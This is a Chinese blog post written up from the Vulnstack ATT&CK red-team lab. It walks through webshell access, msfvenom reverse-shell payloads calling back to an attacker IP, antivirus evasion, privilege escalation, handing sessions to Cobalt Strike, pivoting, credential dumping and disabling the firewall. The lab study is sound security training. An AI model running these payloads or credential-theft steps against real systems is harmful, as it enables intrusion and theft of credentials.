<!DOCTYPE html>
<html>
  
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta name="author" content="FengHLZ">
  
  
  <title>ATT&amp;CK红队评估（一） | xyz|All</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="渗透测试,ATT&amp;CK实战系列,">
  

  
  <meta name="description" content="项目地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/">

  

  <script src="/js/av-min.js" async></script>

  

  
    <script src="/js/Valine.min.js" async></script>
  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"mB9CftyvuDc5gN6R44KukJtw-gzGzoHsz","appkey":"gRRwrnOXHglzMIz3blENWVJV","comment":true,"count":true},
    welcome: {"enable":true,"interval":30},
    start_time: "2018-07-09",
    passwords: ["efe07af7441da2b69c4a41e42e73be4db47f66010a56900788a458354a7373ec", ],
    is_post: true,
    lock: false,
    author: "FengHLZ",
    share: {"twitter":true,"facebook":true,"weibo":true,"qq":true,"wechat":true},
    mathjax: false,
    page_type: ""
  };
</script>

  <script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>
<script src="/js/jquery.min.js"></script>

  
    <link rel="icon" href="/images/siteimage.jpg">
    <link rel="apple-touch-icon" href="/images/siteimage.jpg">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  <link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">

  
</head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">FengHLZ.xyz</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | Know it - Do it</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/tags/" target="_self">标签</a>
      
        <a href="/categories/" target="_self">分类</a>
      
        <a href="/passages/2020-02-12-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86%E6%80%BB%E7%BB%93/index.html" target="_self">信息搜集</a>
      
        <a href="/friends/" target="_self">友链</a>
      
        <a href="/about/index.html" target="_self">关于</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/FengHLZ" target="_blank">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
    </div>
  </div>
</header>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2020-03-05
    </span>
    
      <span>
        | <a href="/categories/渗透测试/"><i class="fa fa-bookmark"></i>渗透测试</a>
      </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    ATT&CK红队评估（一）
  </h1>
  
  <article class="passage-article">
    <h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><h3 id="网络拓扑图"><a href="#网络拓扑图" class="headerlink" title="网络拓扑图"></a>网络拓扑图</h3><p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318155546.png" alt></p>
<h3 id="靶机网卡及IP"><a href="#靶机网卡及IP" class="headerlink" title="靶机网卡及IP"></a>靶机网卡及IP</h3><ul>
<li>kali攻击机：外网网卡；DHCP；192.168.91.130</li>
<li>Windows 7：双网卡；外网IP：192.168.91.141；内网IP：192.168.52.143</li>
<li>Win2k3：内网IP：192.168.52.141</li>
<li>Windows server 2008 R2：内网IP：192.168.52.138</li>
</ul>
<h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>通过<code>yxcms</code>后台 弱口令 + 模板文件 getshell。具体不详细说明，本文章主要记录内网渗透的过程。</p>
<p>使用<strong>蚁剑</strong>作为webshell管理工具，界面好看，支持中文。</p>
<h3 id="MSF监听，反弹php-meterpreter"><a href="#MSF监听，反弹php-meterpreter" class="headerlink" title="MSF监听，反弹php-meterpreter"></a>MSF监听，反弹<code>php-meterpreter</code></h3><p>使用<code>msfvenom</code>生成<code>payload</code>文件，使用菜刀/蚁剑<strong>上传</strong>到WWW目录下：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318160847.png" alt></p>
<p>使用<code>handler</code>模块接收反弹模块，在<code>7777</code>端口上进行监听，访问<code>test.php</code>，连接成功：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318161844.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318161940.png" alt></p>
<h3 id="免杀payload"><a href="#免杀payload" class="headerlink" title="免杀payload"></a>免杀payload</h3><p>免杀这一块没有系统学习过，简单记录下：</p>
<ol>
<li><p>正对上述PHP的MSF大马，可以使用<strong>多层编码解码</strong>对大马原文件进行加密，对<strong>关键字进行拆解</strong>免杀：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318163629.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318163638.png" alt></p>
<p><strong>关键字</strong>免杀：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318163709.png" alt></p>
</li>
<li><p>使用<code>msfvenom</code>生成payload，这里的payload<strong>不采取生成pe文件</strong>，而<strong>采取shellcode方式</strong>，来<strong>借助第三方</strong>直接加载到内存中</p>
<p><code>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b &#39;\x00\x0b&#39; LHOST=XXXXXXX LPORT=7777 -f  c</code></p>
<p>编译为EXE文件并到目标主机上执行，即可免杀。</p>
<p>学习链接：<a href="https://www.cnblogs.com/LyShark/p/11331476.html" target="_blank" rel="noopener">https://www.cnblogs.com/LyShark/p/11331476.html</a> 含多种语言多种编译后门方式。</p>
</li>
</ol>
<h3 id="MSF提权"><a href="#MSF提权" class="headerlink" title="MSF提权"></a>MSF提权</h3><h4 id="UAC提权"><a href="#UAC提权" class="headerlink" title="UAC提权"></a>UAC提权</h4><p>首先<code>background</code>将当前会话保存到后台，<code>sessions</code>可以查看当前后台所有会话，每个session对应一个ID值，use进入模块，将参数session设置为噶保存的session ID值，直接exploit，执行成功后会返回一个新的meterpreter，getsystem就可获得system权限。</p>
<p>原理参考<code>《网络攻防实战研究 漏洞利用与提权》</code></p>
<p>此处已经是最高权限了，继续bypassuac，会提示：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200318165636.png" alt></p>
<h4 id="MS系列未修补的漏洞进行提权"><a href="#MS系列未修补的漏洞进行提权" class="headerlink" title="MS系列未修补的漏洞进行提权"></a>MS系列未修补的漏洞进行提权</h4><p><code>systeminfo</code>命令查看系统打了说明补丁。ms13-081、ms15-051、ms16-032、ms17-010等，search搜索模块，use使用模块，set session Id</p>
<h4 id="通过假冒令牌提权"><a href="#通过假冒令牌提权" class="headerlink" title="通过假冒令牌提权"></a>通过假冒令牌提权</h4><p>用户登录windows操作系统时系统会给用户分配令牌，的那个用户访问资源系统是会使用令牌进行身份认证，若目标环境是域环境且域管理员登陆过有权限的终端即可假冒域管理员的角色<br>使用<code>use incognito</code>进入假冒令牌模块<br><code>list_tokens –u</code> 查看存在的令牌<br><code>impersonate_token</code> 用户名（\）</p>
<p>具体参看书籍。</p>
<h3 id="CS利用"><a href="#CS利用" class="headerlink" title="CS利用"></a>CS利用</h3><p>要获得<code>CS</code>的<code>beacon</code>，可以生成<strong>木马文件</strong>回弹<code>beacon</code>，也可以将MSF的<code>meterpreter</code>派生给<code>CS</code></p>
<h4 id="MSF派生给CS"><a href="#MSF派生给CS" class="headerlink" title="MSF派生给CS"></a>MSF派生给CS</h4><p>执行<code>background</code>将会话放到后台，切换payload</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(handler) &gt;  use exploit/windows/<span class="built_in">local</span>/payload_inject</span><br><span class="line">msf exploit(payload_inject) &gt; <span class="built_in">set</span> PAYLOAD windows/meterpreter/reverse_http</span><br><span class="line">msf exploit(payload_inject) &gt; <span class="built_in">set</span> DisablePayloadHandler <span class="literal">true</span></span><br><span class="line">msf exploit(payload_inject) &gt; <span class="built_in">set</span> LHOST [Listener监听IP]</span><br><span class="line">msf exploit(payload_inject) &gt; <span class="built_in">set</span> LPORT [Listener监听端口]</span><br><span class="line">msf exploit(payload_inject) &gt; <span class="built_in">set</span> SESSION [session ID]</span><br><span class="line">msf exploit(payload_inject) &gt; exploit</span><br></pre></td></tr></table></figure>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321101639.png" alt></p>
<p>可能是<code>php-meterpreter</code>的会话与该模块不匹配。</p>
<p>试下Windows下的<code>PE文件</code>的<code>meterpreter</code>：</p>
<p><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.130 LPORT=8765 -f exe&gt;shell.exe</code></p>
<p><strong>MSF监听模块</strong></p>
<p>蚁剑的虚拟终端执行：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321102835.png" alt></p>
<p>收到meterpreter：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321103003.png" alt></p>
<p>这是两个不同类型的<code>meterpreter-shell</code>：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321103046.png" alt></p>
<p>再尝试上述派生给CS（CS的<code>Listener</code>选择<code>windows/beacon_http/reverse_http</code>）：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321103520.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321103649.png" alt></p>
<p>关于<code>meterpreter php/windows</code>，没有找到可派生的对应的模块。。</p>
<p>同理，CS的<code>beacon</code>也可以派生给<code>MSF</code>：<a href="https://xz.aliyun.com/t/6722" target="_blank" rel="noopener">https://xz.aliyun.com/t/6722</a></p>
<h2 id="CS与MSF联动"><a href="#CS与MSF联动" class="headerlink" title="CS与MSF联动"></a>CS与MSF联动</h2><p>通过CS拿到一个beacon后，通过beacon内置的socks功能在VPS上开启代理端口，将本地的MSF直接带入目标内网。</p>
<p>Beacon下开启socks 端口     // 开启socks代理</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321105359.png" alt></p>
<p>View -&gt; Proxy Pivots        // 复制代理链接到MSF中</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321105503.png" alt></p>
<p>msf5 &gt; setg Proxies socks4:192.168.91.130:7890     // 让msf所有模块的流量都通过此代理走。(setg全局设置)</p>
<p>msf5 &gt; setg ReverseAllowProxy true #允许反向代理，通过socks反弹shell，建立双向通道。</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321105650.png" alt></p>
<p>其他操作看不太懂。。</p>
<h2 id="主机密码收集"><a href="#主机密码收集" class="headerlink" title="主机密码收集"></a>主机密码收集</h2><h3 id="CS中使用hashdump和logonpasswords"><a href="#CS中使用hashdump和logonpasswords" class="headerlink" title="CS中使用hashdump和logonpasswords"></a>CS中使用<code>hashdump</code>和<code>logonpasswords</code></h3><p>执行完上述两条命令后，在<code>view -&gt; Credentials</code>下查看</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321111431.png" alt></p>
<h3 id="LaZagne"><a href="#LaZagne" class="headerlink" title="LaZagne"></a>LaZagne</h3><p><a href="https://github.com/AlessandroZ/LaZagne/releases" target="_blank" rel="noopener">https://github.com/AlessandroZ/LaZagne/releases</a></p>
<p>用于查找本地存储的所有密码，将exe文件上传到目标主机上再执行</p>
<p><strong>推荐在meterpreter下执行shell，再执行该文件。</strong>beacon的交互shell也挺好，蚁剑的虚拟终端没有回显。</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321113451.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321113519.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321113549.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321113605.png" alt></p>
<h2 id="内网搜集"><a href="#内网搜集" class="headerlink" title="内网搜集"></a>内网搜集</h2><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><h4 id="1-补丁信息"><a href="#1-补丁信息" class="headerlink" title="1. 补丁信息"></a>1. 补丁信息</h4><p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321114232.png" alt></p>
<p><strong>踩坑</strong>：之前执行这个exe木马文件时，是在蚁剑下执行的，实际上是apache上的一个进程，当执行上面查看补丁的命令时，会失败：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321114523.png" alt></p>
<p>我们可以迁移一下进程再执行（不一定成功）。</p>
<h4 id="2-安装软件信息"><a href="#2-安装软件信息" class="headerlink" title="2. 安装软件信息"></a>2. 安装软件信息</h4><p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321115643.png" alt></p>
<p>发现有nmap，可以直接利用nmap对内网<code>192.168.52.*</code>网段进行扫描</p>
<p>python可以对<code>LaZagne-master</code>项目上传python脚本到目标主机上，再对其进行打包成exe从而<strong>绕过MD5检测</strong>等</p>
<h4 id="3-查看路由信息"><a href="#3-查看路由信息" class="headerlink" title="3. 查看路由信息"></a>3. 查看路由信息</h4><p>添加路由到目标环境网络，使得MSF能够通过Win7路由转发访问192.168.52.0网段</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321120205.png" alt></p>
<p>添加成功：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321120322.png" alt></p>
<h4 id="4-arp扫描52网段"><a href="#4-arp扫描52网段" class="headerlink" title="4. arp扫描52网段"></a>4. arp扫描52网段</h4><p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321120622.png" alt></p>
<h4 id="5-nmap扫描主机（先关闭防火墙）"><a href="#5-nmap扫描主机（先关闭防火墙）" class="headerlink" title="5. nmap扫描主机（先关闭防火墙）"></a>5. nmap扫描主机（先关闭防火墙）</h4><ul>
<li><code>-sS</code>：TCP SYN scans</li>
<li><code>-sV</code>：探索开放的端口、确定服务/版本信息</li>
<li><code>-O</code>：探测操作系统信息</li>
</ul>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321134619.png" alt></p>
<p><strong>尝试关闭防火墙</strong>：</p>
<ul>
<li><code>shell</code> -&gt; <code>netsh advfirewall set allprofiles state off</code></li>
</ul>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321142410.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321142620.png" alt></p>
<p>需要管理员权限，<strong>先本地提权</strong>。</p>
<ul>
<li><code>meterpreter &gt;  run post/windows/manage/enable_rdp</code> 远程桌面服务防火墙</li>
</ul>
<p>再用<code>nmap</code>扫描一下：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321143027.png" alt></p>
<p>使用nmap的<code>vuln</code>脚本扫描：</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321143352.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321143420.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321143450.png" alt></p>
<p>很多漏洞可以直接使用msf利用。</p>
<h4 id="6-nmap扫描内网主机"><a href="#6-nmap扫描内网主机" class="headerlink" title="6. nmap扫描内网主机"></a>6. nmap扫描内网主机</h4><p>先添加路由，再扫描。这个靶机中安装了nmap，也可以直接使用它的进行探测。</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321144354.png" alt></p>
<p>使用靶机自己安装的nmap进行扫描，结果不一样。。<strong>可能是防火墙的缘故</strong>，带来点思考。。</p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321145214.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321145251.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321144640.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321145736.png" alt></p>
<p><img src="https://figure-bed-1258919161.cos.ap-chengdu.myqcloud.com/md-img/20200321145814.png" alt></p>
<h2 id="内网攻击"><a href="#内网攻击" class="headerlink" title="内网攻击"></a>内网攻击</h2><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://mp.weixin.qq.com/s?__biz=MzI4NjEyMDk0MA==&amp;mid=2649849539&amp;idx=1&amp;sn=c7c739a8494d79cf5cfcfe613b6b193d&amp;chksm=f3e41040c493995666ae142800969365be4aadde55e6ca2df8e74185c4973da26217aaf58c23&amp;scene=21#wechat_redirect" target="_blank" rel="noopener">ATT&amp;CK实战 | 红队评估一(上)</a></p>
  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#网络拓扑图"><span class="toc-text">网络拓扑图</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#靶机网卡及IP"><span class="toc-text">靶机网卡及IP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-text">getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF监听，反弹php-meterpreter"><span class="toc-text">MSF监听，反弹php-meterpreter</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#免杀payload"><span class="toc-text">免杀payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF提权"><span class="toc-text">MSF提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#UAC提权"><span class="toc-text">UAC提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MS系列未修补的漏洞进行提权"><span class="toc-text">MS系列未修补的漏洞进行提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#通过假冒令牌提权"><span class="toc-text">通过假冒令牌提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CS利用"><span class="toc-text">CS利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#MSF派生给CS"><span class="toc-text">MSF派生给CS</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CS与MSF联动"><span class="toc-text">CS与MSF联动</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#主机密码收集"><span class="toc-text">主机密码收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CS中使用hashdump和logonpasswords"><span class="toc-text">CS中使用hashdump和logonpasswords</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#LaZagne"><span class="toc-text">LaZagne</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#内网搜集"><span class="toc-text">内网搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#内网信息收集"><span class="toc-text">内网信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-补丁信息"><span class="toc-text">1. 补丁信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-安装软件信息"><span class="toc-text">2. 安装软件信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-查看路由信息"><span class="toc-text">3. 查看路由信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-arp扫描52网段"><span class="toc-text">4. arp扫描52网段</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-nmap扫描主机（先关闭防火墙）"><span class="toc-text">5. nmap扫描主机（先关闭防火墙）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-nmap扫描内网主机"><span class="toc-text">6. nmap扫描内网主机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#内网攻击"><span class="toc-text">内网攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考链接"><span class="toc-text">参考链接</span></a></li></ol>
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: FengHLZ</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">https://www.fenghlz.xyz/passages/2020-03-05-ATT-CK红队评估（一）/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
    <div class="passage-tags">
     
      <a href="/tags/ATT-CK实战系列/"><i class="fa fa-tags"></i>ATT&CK实战系列</a>
    
    </div>
  
</div>

    </main>
    
      <div class="site-comment-contanier">
  <p id="site-comment-info">
    <i class="fa fa-spinner fa-spin"></i> 评论加载中
  </p>
  <div id="site-comment">
  </div>
</div>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">博客推荐</h5>
        
          <span class="site-footer-item">
            <a href="https://xin-tan.com/" target="_blank">GodBMW</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">书签</h5>
        
          <span class="site-footer-item">
            <a href="https://leancloud.cn/" target="_blank">LeanCloud</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">在线工具</h5>
        
          <span class="site-footer-item">
            <a href="https://www.ilovepdf.com/zh-cn" target="_blank">iLovePDF</a>
          </span>
        
          <span class="site-footer-item">
            <a href="https://www.iloveimg.com/zh-cn" target="_blank">iLoveIMG</a>
          </span>
        
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
      <div class="site-footer-info">
        <i class="fa fa-paw"></i> 您是本站第 <span id="site-count"></span> 位访客
      </div>
    
    
      <div class="site-footer-info">
        <i class="fa fa-at"></i> Email: 2362929771@qq.com
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content" style="height:55%;width:40%;">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <input type="text" id="local-search-input" name="q" results="0" placeholder="search my blog..." class="form-control"/>
      </div>
      <div class="site-layer-reward" id="site-layer-reward" style="display: none;">
        
          <div>
            <img src="/images/wechatpay.png" alt="WeChat">
            
              <p>WeChat</p>
            
          </div>
        
          <div>
            <img src="/images/alipay.jpg" alt="AliPay">
            
              <p>AliPay</p>
            
          </div>
        
      </div>
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
    <div id="local-search-result" style="height:50%;display:none;"></div>
  </div>
</div>
    

<div class="bottom-bar">
  <div></div>
  <div class="bottom-bar-left">
    <a href="/passages/2020-03-14-HTTP请求走私攻击/" data-enable="true">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/passages/2020-02-22-提权知识学习-LIN-SECURITY靶场/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
      <a href="#site-comment" data-enable="true">
        <i class="fa fa-commenting"></i>
      </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    <a href="javascript:void(0);" id="site-reward">
      <i class="fa fa-thumbs-up"></i>
    </a>
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
    <a id="share-btn-twitter" href="javascript:void(0);" target="_blank">
      <i class="fa fa-twitter"></i>
    </a>
  
  
    <a id="share-btn-facebook" href="javascript:void(0);" target="_blank">
      <i class="fa fa-facebook"></i>
    </a>
  
  
    <a id="share-btn-weibo" href="javascript:void(0);" target="_blank">
      <i class="fa fa-weibo"></i>
    </a>
  
  
    <a id="share-btn-qq" href="javascript:void(0);" target="_blank">
      <i class="fa fa-qq"></i>
    </a>
  
  
    <a id="share-btn-wechat" href="javascript:void(0);" target="_blank">
      <i class="fa fa-wechat"></i>
    </a>
  
</div>
    
  <script async src="https://www.googletagmanager.com/gtag/js?id="></script>
  <script async>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', '');
  </script>



  <script async>
  (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
          bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      }
      else {
          bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
  })();
  </script>



  <script async>
    (function(){
    var src = (document.location.protocol == "http:") ? "http://js.passport.qihucdn.com/11.0.1.js?":"https://jspassport.ssl.qhimg.com/11.0.1.js?";
    document.write('<script src="' + src + '" id="sozz"><\/script>');
    })();
  </script>


  </body>
</html>